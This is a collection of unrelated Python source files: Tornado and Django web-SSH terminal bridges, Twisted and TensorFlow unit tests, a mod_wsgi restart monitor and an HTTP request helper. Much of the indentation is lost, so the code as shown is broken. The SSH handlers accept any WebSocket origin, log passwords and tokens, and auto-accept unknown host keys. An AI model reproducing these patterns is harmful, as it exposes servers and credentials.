cmdb api result: {"code":0,"msg":"","data":{"hostname":"192.168.1.2","port":22,"username":"root",
"password":"password","privatekey":null}}
:return:
"""
url = cmdb_api
logging.info('for cmdb get host, cmdb url: {0}, Request-ID: {1}'.format(url, self.settings['request_id']))
param = self.request.body.decode("utf-8")
param = json.loads(param)
result = requests.post(url=url, data=param, headers=cmdb_headers, timeout=3)
logging.info('request cmdb status: {}, data: {}, Request-ID: {}'.format(result.status_code, result.text, self.settings['request_id']))
json_data = result.json()
data = json_data["data"]
self.request.body_json = data
@tornado.gen.coroutine
@authenticated
def post(self):
worker_id = None
status = None
encoding = None
future = Future()
t = threading.Thread(target=self.ssh_connect_wrapped, args=(future,))
t.setDaemon(True)
t.start()
try:
worker = yield future
except Exception as exc:
status = str(exc)
else:
worker_id = worker.id
logging.info('worker id: {0}, Request-ID: {1}'.format(worker_id, self.settings['request_id']))
workers[worker_id] = worker
self.loop.call_later(DELAY, recycle_worker, worker)
encoding = worker.encoding
self.write(dict(id=worker_id, status=status, encoding=encoding))
class WsockHandler(MixinHandler, tornado.websocket.WebSocketHandler):
def initialize(self, loop):
self.loop = loop
self.worker_ref = None
def check_origin(self, origin):
return True
def get_client_addr(self):
return self.get_real_client_addr() or self.stream.socket.getpeername()
def open(self):
self.src_addr = self.get_client_addr()
logging.info('Connected from {}:{}'.format(*self.src_addr))
worker = workers.get(self.get_argument('id'))
if worker and worker.src_addr[0] == self.src_addr[0]:
workers.pop(worker.id)
self.set_nodelay(True)
worker.set_handler(self)
self.worker_ref = weakref.ref(worker)
self.loop.add_handler(worker.fd, worker, IOLoop.READ)
else:
self.close(reason='Websocket authentication failed.')
def on_message(self, message):
logging.debug('{!r} from {}:{}'.format(message, *self.src_addr))
worker = self.worker_ref()
try:
msg = json.loads(message)
except JSONDecodeError:
return
if not isinstance(msg, dict):
return
resize = msg.get('resize')
if resize and len(resize) == 2:
try:
worker.chan.resize_pty(*resize)
except (TypeError, struct.error, paramiko.SSHException):
pass
data = msg.get('data')
if data and isinstance(data, basestring_type):
worker.data_to_dst.append(data)
worker.on_write()
def on_close(self):
logging.info('Disconnected from {}:{}'.format(*self.src_addr))
worker = self.worker_ref() if self.worker_ref else None
if worker:
if self.close_reason is None:
self.close_reason = 'client disconnected'
worker.close(reason=self.close_reason)
class AuthXsrfHandler(MixinHandler, MixinRequestHandler):
def initialize(self, loop):
self.loop = loop
def options(self, *args, **kwargs):
self.write('success')
def post(self, *args, **kwargs):
if self.is_ajax():
param = self.request.body.decode("utf-8")
param = json.loads(param)
logging.info('Auth info: {0}, Request-ID: {1}'.format(param, self.settings['request_id']))
if user_auth(data=param):
logging.info('Auth successful, Request-ID: {}'.format(self.settings['request_id']))
encoded = jwt_encode(data=param)
logging.debug('Token: {0}, Request-ID: {1}'.format(encoded, self.settings['request_id']))
self.write(dict(code=0, status='success', data='{0}'.format(encoded)))
else:
logging.info('Auth Failed, Request-ID: {}'.format(self.settings['request_id']))
                self.write(dict(code=1, status='username or password is incorrect', data=''))
else:
            logging.error('invalid request type, Request-ID: {}'.format(self.settings['request_id']))
self.write(dict(code=2, status='request type error', data=''))
|
test_threadworker.py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted._threads._threadworker}.
"""
import gc
import weakref
from twisted.trial.unittest import SynchronousTestCase
from threading import ThreadError, local
from .. import ThreadWorker, LockWorker, AlreadyQuit
class FakeQueueEmpty(Exception):
"""
L{FakeQueue}'s C{get} has exhausted the queue.
"""
class WouldDeadlock(Exception):
"""
If this were a real lock, you'd be deadlocked because the lock would be
double-acquired.
"""
class FakeThread:
"""
A fake L{threading.Thread}.
@ivar target: A target function to run.
@type target: L{callable}
@ivar started: Has this thread been started?
@type started: L{bool}
"""
def __init__(self, target):
"""
Create a L{FakeThread} with a target.
"""
self.target = target
self.started = False
def start(self):
"""
Set the "started" flag.
"""
self.started = True
class FakeQueue:
"""
A fake L{Queue} implementing C{put} and C{get}.
    @ivar items: A list of items placed by C{put} but not yet retrieved by
C{get}.
@type items: L{list}
"""
def __init__(self):
"""
Create a L{FakeQueue}.
"""
self.items = []
def put(self, item):
"""
Put an item into the queue for later retrieval by L{FakeQueue.get}.
@param item: any object
"""
self.items.append(item)
def get(self):
"""
Get an item.
@return: an item previously put by C{put}.
"""
if not self.items:
raise FakeQueueEmpty()
return self.items.pop(0)
class FakeLock:
"""
A stand-in for L{threading.Lock}.
@ivar acquired: Whether this lock is presently acquired.
"""
def __init__(self):
"""
Create a lock in the un-acquired state.
"""
self.acquired = False
def acquire(self):
"""
Acquire the lock. Raise an exception if the lock is already acquired.
"""
if self.acquired:
raise WouldDeadlock()
self.acquired = True
def release(self):
"""
Release the lock. Raise an exception if the lock is not presently
acquired.
"""
if not self.acquired:
raise ThreadError()
self.acquired = False
class ThreadWorkerTests(SynchronousTestCase):
"""
Tests for L{ThreadWorker}.
"""
def setUp(self):
"""
Create a worker with fake threads.
"""
self.fakeThreads = []
self.fakeQueue = FakeQueue()
def startThread(target):
newThread = FakeThread(target=target)
newThread.start()
self.fakeThreads.append(newThread)
return newThread
self.worker = ThreadWorker(startThread, self.fakeQueue)
def test_startsThreadAndPerformsWork(self):
"""
L{ThreadWorker} calls its C{createThread} callable to create a thread,
its C{createQueue} callable to create a queue, and then the thread's
target pulls work from that queue.
"""
self.assertEqual(len(self.fakeThreads), 1)
self.assertEqual(self.fakeThreads[0].started, True)
def doIt():
doIt.done = True
doIt.done = False
self.worker.do(doIt)
self.assertEqual(doIt.done, False)
self.assertRaises(FakeQueueEmpty, self.fakeThreads[0].target)
self.assertEqual(doIt.done, True)
def test_quitPreventsFutureCalls(self):
"""
L{ThreadWorker.quit} causes future calls to L{ThreadWorker.do} and
L{ThreadWorker.quit} to raise L{AlreadyQuit}.
"""
self.worker.quit()
self.assertRaises(AlreadyQuit, self.worker.quit)
self.assertRaises(AlreadyQuit, self.worker.do, list)
class LockWorkerTests(SynchronousTestCase):
"""
Tests for L{LockWorker}.
"""
def test_fakeDeadlock(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
deadlock.
"""
lock = FakeLock()
lock.acquire()
self.assertRaises(WouldDeadlock, lock.acquire)
def test_fakeDoubleRelease(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
double-release.
"""
lock = FakeLock()
self.assertRaises(ThreadError, lock.release)
lock.acquire()
self.assertEqual(None, lock.release())
self.assertRaises(ThreadError, lock.release)
def test_doExecutesImmediatelyWithLock(self):
"""
L{LockWorker.do} immediately performs the work it's given, while the
lock is acquired.
"""
storage = local()
lock = FakeLock()
worker = LockWorker(lock, storage)
def work():
work.done = True
work.acquired = lock.acquired
work.done = False
worker.do(work)
self.assertEqual(work.done, True)
self.assertEqual(work.acquired, True)
self.assertEqual(lock.acquired, False)
def test_doUnwindsReentrancy(self):
"""
If L{LockWorker.do} is called recursively, it postpones the inner call
until the outer one is complete.
"""
lock = FakeLock()
worker = LockWorker(lock, local())
levels = []
acquired = []
def work():
work.level += 1
levels.append(work.level)
acquired.append(lock.acquired)
if len(levels) < 2:
worker.do(work)
work.level -= 1
work.level = 0
worker.do(work)
self.assertEqual(levels, [1, 1])
self.assertEqual(acquired, [True, True])
def test_quit(self):
"""
L{LockWorker.quit} frees the resources associated with its lock and
causes further calls to C{do} and C{quit} to fail.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
lock = None
self.assertIsNot(ref(), None)
worker.quit()
gc.collect()
self.assertIs(ref(), None)
self.assertRaises(AlreadyQuit, worker.quit)
self.assertRaises(AlreadyQuit, worker.do, list)
def test_quitWhileWorking(self):
"""
If L{LockWorker.quit} is invoked during a call to L{LockWorker.do}, all
recursive work scheduled with L{LockWorker.do} will be completed and
the lock will be released.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
def phase1():
worker.do(phase2)
worker.quit()
self.assertRaises(AlreadyQuit, worker.do, list)
phase1.complete = True
phase1.complete = False
def phase2():
phase2.complete = True
phase2.acquired = lock.acquired
phase2.complete = False
worker.do(phase1)
self.assertEqual(phase1.complete, True)
self.assertEqual(phase2.complete, True)
self.assertEqual(lock.acquired, False)
lock = None
gc.collect()
self.assertIs(ref(), None)
def test_quitWhileGettingLock(self):
"""
If L{LockWorker.do} is called concurrently with L{LockWorker.quit}, and
C{quit} wins the race before C{do} gets the lock attribute, then
L{AlreadyQuit} will be raised.
"""
class RacyLockWorker(LockWorker):
@property
def _lock(self):
self.quit()
return self.__dict__['_lock']
@_lock.setter
def _lock(self, value):
self.__dict__['_lock'] = value
worker = RacyLockWorker(FakeLock(), local())
self.assertRaises(AlreadyQuit, worker.do, list)
|
wsgi_restart.py
|
# This code lifted from the mod_wsgi docs.
import os
import sys
import signal
import threading
import atexit
import Queue
_interval = 1.0
_times = {}
_files = []
_running = False
_queue = Queue.Queue()
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Change detected to \'%s\'.' % (prefix, path)
print >> sys.stderr, '%s Triggering process restart.' % prefix
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
        # If path doesn't denote a file and we were previously
        # tracking it, then it has been removed or the file type
        # has changed, so force a restart. If we were not previously
        # tracking the file then we can ignore it, as it is probably a
        # pseudo reference such as a file extracted from a
        # collection of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
except Exception:
        # If any exception occurred, it is likely that the file has
        # been removed just before stat(), so force a restart.
return True
return False
def _monitor():
while 1:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except Exception:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except Exception:
pass
_thread.join()
atexit.register(_exiting)
def track(path):
if path not in _files:
_files.append(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
_lock.acquire()
if not _running:
prefix = 'monitor (pid=%d):' % os.getpid()
print >> sys.stderr, '%s Starting change monitor.' % prefix
_running = True
        _thread.start()
    _lock.release()
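# Usage sketch from a WSGI script (the module name and tracked path below are
# assumptions, not part of this file):
#
#   import wsgi_restart
#   wsgi_restart.start(interval=1.0)          # begin polling sys.modules
#   wsgi_restart.track('/path/to/some.config')  # also watch a non-module file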
|
request.py
|
from response import LazyResponse
from parser import Parser
from threading import Thread
from multiprocessing import Pipe
class Request(object):
"""
HTTP request.
"""
def __init__(self, config):
"""
Initialize an HTTP request instance for a given configuration.
"""
self.config = config
def __call__(self, **kwargs):
"""
Perform the request
The optional payload argument is sent to the server.
"""
if (not self.config.is_async):
return self._process_flow(kwargs)
else:
return self._process_async_flow(kwargs)
def _process_flow(self, payload):
"""
Put payload environment and start the chain.
"""
env = {}
if payload:
env = {'payload': payload}
procs = list(self.config.processors)
return Parser(procs).follow(self.config, env)
def _process_async_flow(self, payload):
"""
Starts an async chain.
"""
self.config.pipe, child_pipe = Pipe()
def handle_async():
if self.config.is_async and self.config.callback is None:
self._process_flow(payload=payload)
else:
self.config.callback(self._process_flow(payload=payload), \
*self.config.callback_args)
self._start_new_thread(handle_async)
return LazyResponse(child_pipe)
def _start_new_thread(self, target):
thread = Thread(target=target)
thread.start()
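# Usage sketch (the `config` object here is hypothetical; Request only relies
# on the attributes read above: processors, is_async, callback, callback_args
# and, for async calls, pipe):
#
#   req = Request(config)
#   response = req(name='value')    # synchronous: returns the parsed response
#   lazy = Request(async_config)()  # asynchronous: returns a LazyResponse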
|
dumping_wrapper_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit Tests for classes in dumping_wrapper.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import shutil
import tempfile
import threading
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import dumping_wrapper
from tensorflow.python.debug.wrappers import framework
from tensorflow.python.debug.wrappers import hooks
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
from tensorflow.python.training import monitored_session
@test_util.run_v1_only("b/120545219")
class DumpingDebugWrapperSessionTest(test_util.TensorFlowTestCase):
def setUp(self):
self.session_root = tempfile.mkdtemp()
with test_util.device(use_gpu=False):
self.v = variables.VariableV1(10.0, dtype=dtypes.float32, name="v")
self.delta = constant_op.constant(1.0, dtype=dtypes.float32, name="delta")
self.eta = constant_op.constant(-1.4, dtype=dtypes.float32, name="eta")
self.inc_v = state_ops.assign_add(self.v, self.delta, name="inc_v")
self.dec_v = state_ops.assign_add(self.v, self.eta, name="dec_v")
self.ph = array_ops.placeholder(dtypes.float32, shape=(), name="ph")
self.inc_w_ph = state_ops.assign_add(self.v, self.ph, name="inc_w_ph")
self.sess = session.Session()
self.sess.run(self.v.initializer)
def tearDown(self):
ops.reset_default_graph()
if os.path.isdir(self.session_root):
shutil.rmtree(self.session_root)
def _assert_correct_run_subdir_naming(self, run_subdir):
self.assertStartsWith(run_subdir, "run_")
self.assertEqual(2, run_subdir.count("_"))
self.assertGreater(int(run_subdir.split("_")[1]), 0)
def testConstructWrapperWithExistingNonEmptyRootDirRaisesException(self):
dir_path = os.path.join(self.session_root, "foo")
os.mkdir(dir_path)
self.assertTrue(os.path.isdir(dir_path))
with self.assertRaisesRegexp(
ValueError, "session_root path points to a non-empty directory"):
dumping_wrapper.DumpingDebugWrapperSession(
session.Session(), session_root=self.session_root, log_usage=False)
def testConstructWrapperWithExistingFileDumpRootRaisesException(self):
file_path = os.path.join(self.session_root, "foo")
open(file_path, "a").close() # Create the file
self.assertTrue(gfile.Exists(file_path))
self.assertFalse(gfile.IsDirectory(file_path))
with self.assertRaisesRegexp(ValueError,
"session_root path points to a file"):
dumping_wrapper.DumpingDebugWrapperSession(
session.Session(), session_root=file_path, log_usage=False)
def testConstructWrapperWithNonexistentSessionRootCreatesDirectory(self):
new_dir_path = os.path.join(tempfile.mkdtemp(), "new_dir")
dumping_wrapper.DumpingDebugWrapperSession(
session.Session(), session_root=new_dir_path, log_usage=False)
self.assertTrue(gfile.IsDirectory(new_dir_path))
# Cleanup.
gfile.DeleteRecursively(new_dir_path)
def testDumpingOnASingleRunWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
self._assert_correct_run_subdir_naming(os.path.basename(dump_dirs[0]))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingOnASingleRunWorksWithRelativePathForDebugDumpDir(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
cwd = os.getcwd()
try:
os.chdir(self.session_root)
dump = debug_data.DebugDumpDir(
os.path.relpath(dump_dirs[0], self.session_root))
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
finally:
os.chdir(cwd)
def testDumpingOnASingleRunWithFeedDictWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
feed_dict = {self.ph: 3.2}
sess.run(self.inc_w_ph, feed_dict=feed_dict)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
self._assert_correct_run_subdir_naming(os.path.basename(dump_dirs[0]))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_w_ph), dump.run_fetches_info)
self.assertEqual(repr(feed_dict.keys()), dump.run_feed_keys_info)
def testDumpingOnMultipleRunsWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
for _ in range(3):
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(3, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
self.assertAllClose([10.0 + 1.0 * i],
dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testUsingNonCallableAsWatchFnRaisesTypeError(self):
bad_watch_fn = "bad_watch_fn"
with self.assertRaisesRegexp(TypeError, "watch_fn is not callable"):
dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=bad_watch_fn,
log_usage=False)
def testDumpingWithLegacyWatchFnOnFetchesWorks(self):
"""Use a watch_fn that returns different whitelists for different runs."""
def watch_fn(fetches, feeds):
del feeds
# A watch_fn that picks fetch name.
if fetches.name == "inc_v:0":
# If inc_v, watch everything.
return "DebugIdentity", r".*", r".*"
else:
# If dec_v, watch nothing.
return "DebugIdentity", r"$^", r"$^"
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=watch_fn,
log_usage=False)
for _ in range(3):
sess.run(self.inc_v)
sess.run(self.dec_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(6, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
if i % 2 == 0:
self.assertGreater(dump.size, 0)
self.assertAllClose([10.0 - 0.4 * (i / 2)],
dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
else:
self.assertEqual(0, dump.size)
self.assertEqual(repr(self.dec_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingWithLegacyWatchFnWithNonDefaultDebugOpsWorks(self):
"""Use a watch_fn that specifies non-default debug ops."""
def watch_fn(fetches, feeds):
del fetches, feeds
return ["DebugIdentity", "DebugNumericSummary"], r".*", r".*"
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=watch_fn,
log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(14,
len(dump.get_tensors("v", 0, "DebugNumericSummary")[0]))
def testDumpingWithWatchFnWithNonDefaultDebugOpsWorks(self):
"""Use a watch_fn that specifies non-default debug ops."""
def watch_fn(fetches, feeds):
del fetches, feeds
return framework.WatchOptions(
debug_ops=["DebugIdentity", "DebugNumericSummary"],
node_name_regex_whitelist=r"^v.*",
op_type_regex_whitelist=r".*",
tensor_dtype_regex_whitelist=".*_ref")
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess,
session_root=self.session_root,
watch_fn=watch_fn,
log_usage=False)
sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(14,
len(dump.get_tensors("v", 0, "DebugNumericSummary")[0]))
dumped_nodes = [dump.node_name for dump in dump.dumped_tensor_data]
self.assertNotIn("inc_v", dumped_nodes)
self.assertNotIn("delta", dumped_nodes)
def testDumpingDebugHookWithoutWatchFnWorks(self):
dumping_hook = hooks.DumpingDebugHook(self.session_root, log_usage=False)
mon_sess = monitored_session._HookedSession(self.sess, [dumping_hook])
mon_sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
self._assert_correct_run_subdir_naming(os.path.basename(dump_dirs[0]))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertAllClose([10.0], dump.get_tensors("v", 0, "DebugIdentity"))
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingDebugHookWithStatefulWatchFnWorks(self):
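    """Use a watch_fn that keeps state to alternate watching between runs."""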
watch_fn_state = {"run_counter": 0}
def counting_watch_fn(fetches, feed_dict):
del fetches, feed_dict
watch_fn_state["run_counter"] += 1
if watch_fn_state["run_counter"] % 2 == 1:
# If odd-index run (1-based), watch every ref-type tensor.
return framework.WatchOptions(
debug_ops="DebugIdentity",
tensor_dtype_regex_whitelist=".*_ref")
else:
# If even-index run, watch nothing.
return framework.WatchOptions(
debug_ops="DebugIdentity",
node_name_regex_whitelist=r"^$",
op_type_regex_whitelist=r"^$")
dumping_hook = hooks.DumpingDebugHook(
self.session_root, watch_fn=counting_watch_fn, log_usage=False)
mon_sess = monitored_session._HookedSession(self.sess, [dumping_hook])
for _ in range(4):
mon_sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(4, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
if i % 2 == 0:
self.assertAllClose([10.0 + 1.0 * i],
dump.get_tensors("v", 0, "DebugIdentity"))
self.assertNotIn("delta",
[datum.node_name for datum in dump.dumped_tensor_data])
else:
self.assertEqual(0, dump.size)
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingDebugHookWithStatefulLegacyWatchFnWorks(self):
watch_fn_state = {"run_counter": 0}
def counting_watch_fn(fetches, feed_dict):
del fetches, feed_dict
watch_fn_state["run_counter"] += 1
if watch_fn_state["run_counter"] % 2 == 1:
# If odd-index run (1-based), watch everything.
return "DebugIdentity", r".*", r".*"
else:
# If even-index run, watch nothing.
return "DebugIdentity", r"$^", r"$^"
dumping_hook = hooks.DumpingDebugHook(
self.session_root, watch_fn=counting_watch_fn, log_usage=False)
mon_sess = monitored_session._HookedSession(self.sess, [dumping_hook])
for _ in range(4):
mon_sess.run(self.inc_v)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
dump_dirs = sorted(
dump_dirs, key=lambda x: int(os.path.basename(x).split("_")[1]))
self.assertEqual(4, len(dump_dirs))
for i, dump_dir in enumerate(dump_dirs):
self._assert_correct_run_subdir_naming(os.path.basename(dump_dir))
dump = debug_data.DebugDumpDir(dump_dir)
if i % 2 == 0:
self.assertAllClose([10.0 + 1.0 * i],
dump.get_tensors("v", 0, "DebugIdentity"))
else:
self.assertEqual(0, dump.size)
self.assertEqual(repr(self.inc_v), dump.run_fetches_info)
self.assertEqual(repr(None), dump.run_feed_keys_info)
def testDumpingFromMultipleThreadsObeysThreadNameFilter(self):
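    """Only the run on the main thread should be dumped, per thread_name_filter."""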
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False,
thread_name_filter=r"MainThread$")
self.assertAllClose(1.0, sess.run(self.delta))
child_thread_result = []
def child_thread_job():
child_thread_result.append(sess.run(self.eta))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
thread.join()
self.assertAllClose([-1.4], child_thread_result)
dump_dirs = glob.glob(os.path.join(self.session_root, "run_*"))
self.assertEqual(1, len(dump_dirs))
dump = debug_data.DebugDumpDir(dump_dirs[0])
self.assertEqual(1, dump.size)
self.assertEqual("delta", dump.dumped_tensor_data[0].node_name)
def testDumpingWrapperWithEmptyFetchWorks(self):
sess = dumping_wrapper.DumpingDebugWrapperSession(
self.sess, session_root=self.session_root, log_usage=False)
sess.run([])
if __name__ == "__main__":
googletest.main()
|
consumers.py
|
from asgiref.sync import async_to_sync
from channels.generic.websocket import WebsocketConsumer, AsyncWebsocketConsumer
import json
import base64
from django.http.request import QueryDict
import paramiko
import socket
from threading import Thread
import time
import os
from django.utils.six import StringIO
from django.conf import settings
from .models import Host
def get_key_obj(pkeyobj, pkey_file=None, pkey_obj=None, password=None):
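    """Try to parse a private key with the given paramiko key class.

    The key is read from a file path (pkey_file) or a file-like object (pkey_obj).
    Returns the key object on success, or None if parsing fails; a failed file-like
    object is rewound so another key class can be tried.
    """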
if pkey_file:
with open(pkey_file) as fo:
try:
pkey = pkeyobj.from_private_key(fo, password=password)
return pkey
except:
pass
else:
try:
pkey = pkeyobj.from_private_key(pkey_obj, password=password)
return pkey
except:
pkey_obj.seek(0)
class SSHBridge(object):
"""
桥接WebSocket和ssh
参考:https://blog.51cto.com/hongchen99/2336087
"""
def __init__(self, websocket, simpleuser):
self.websocket = websocket
self.simpleuser = simpleuser
def connect(self, host, user, pwd=None, key=None, port=22, timeout=6, term='xterm', pty_width=80, pty_height=24):
"""
建立SSH连接,放在 self.ssh_channel 通道中,之后直接在通道中交互数据
:param host:
:param user:
:param pwd:
:param key:
:param port:
:param timeout:
:param term:
:param pty_width:
:param pty_height:
:return:
"""
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
if key:
                # Key-based authentication
pkey = get_key_obj(paramiko.RSAKey, pkey_obj=key, password=pwd) or \
get_key_obj(paramiko.DSSKey, pkey_obj=key, password=pwd) or \
get_key_obj(paramiko.ECDSAKey, pkey_obj=key, password=pwd) or \
get_key_obj(paramiko.Ed25519Key,
pkey_obj=key, password=pwd)
ssh_client.connect(username=user, hostname=host,
port=port, pkey=pkey, timeout=timeout)
else:
ssh_client.connect(hostname=host, port=port,
username=user, password=pwd, timeout=timeout)
except Exception as e:
# print(e)
message = json.dumps({'flag': 'fail', 'message': str(e)})
self.websocket.send_message_or_team(message)
return
transport = ssh_client.get_transport()
"""
另一种方式建立通道
transport = paramiko.Transport((host, port,))
transport.start_client()
transport.auth_password(username=user, password=pwd)
"""
# 打开一个通道
self.ssh_channel = transport.open_session()
# 获取一个终端
self.ssh_channel.get_pty(term=term, width=pty_width, height=pty_height)
# 激活终端,这样就可以登录到终端了,就和我们用类似于xshell登录系统一样
self.ssh_channel.invoke_shell()
# 获取ssh连接主机后的返回内容,例如Linux,会显示上次登录等信息,把这些信息通过WebSocket显示到Web终端。
# 连接建立一次,之后交互数据不会再进入该方法
for i in range(2):
recv = self.ssh_channel.recv(1024).decode('utf-8')
message = json.dumps({'flag': 'msg', 'message': recv})
            # print('[WS --websocket--> Web] Welcome banner returned after opening the SSH channel:', message)
self.websocket.send_message_or_team(message)
def close(self):
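        """Notify the client, then close the SSH channel and the WebSocket."""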
        message = {'flag': 0, 'message': 'Closing the WebSocket and SSH connections'}
        # Send a closing notice over the WebSocket
        self.websocket.send_message_or_team(json.dumps(message))
        try:
            # Close the SSH channel
            self.ssh_channel.close()
            # Close the WebSocket connection
            self.websocket.close()
        except BaseException as e:
            # print('Exception while closing the WebSocket and SSH connections:', e)
            pass
def _ws_to_ssh(self, data):
"""
尝试发送数据到ssh通道,产生异常则关闭所有连接
"""
try:
# print('【Func --paramiko--> SSH】WebSocket中的数据发送数据到ssh通道:', data)
self.ssh_channel.send(data)
except OSError as e:
# print(e)
self.close()
def _ssh_to_ws(self):
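        """Read output from the SSH channel and push it to the WebSocket until the channel exits."""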
try:
            # while True:
            while not self.ssh_channel.exit_status_ready():
                data = self.ssh_channel.recv(1024).decode('utf-8')
                # print('[SSH --paramiko--> Func] Data received from the SSH channel:', data)
                if len(data) != 0:
                    message = {'flag': 'msg', 'message': data}
                    # print('[WS --websocket--> Web] Sending the output back to the web terminal:', message)
                    self.websocket.send_message_or_team(json.dumps(message))
else:
break
except:
self.close()
def shell(self, data):
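        """Spawn one thread to write the input to SSH and another to relay SSH output back."""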
Thread(target=self._ws_to_ssh, args=(data,)).start()
Thread(target=self._ssh_to_ws).start()
"""
t1 = Thread(target=self._ws_to_ssh, args=(data,))
t1.setDaemon(True)
t1.start()
t2 = Thread(target=self._ssh_to_ws)
t2.setDaemon(True)
t2.start()
"""
def resize_pty(self, cols, rows):
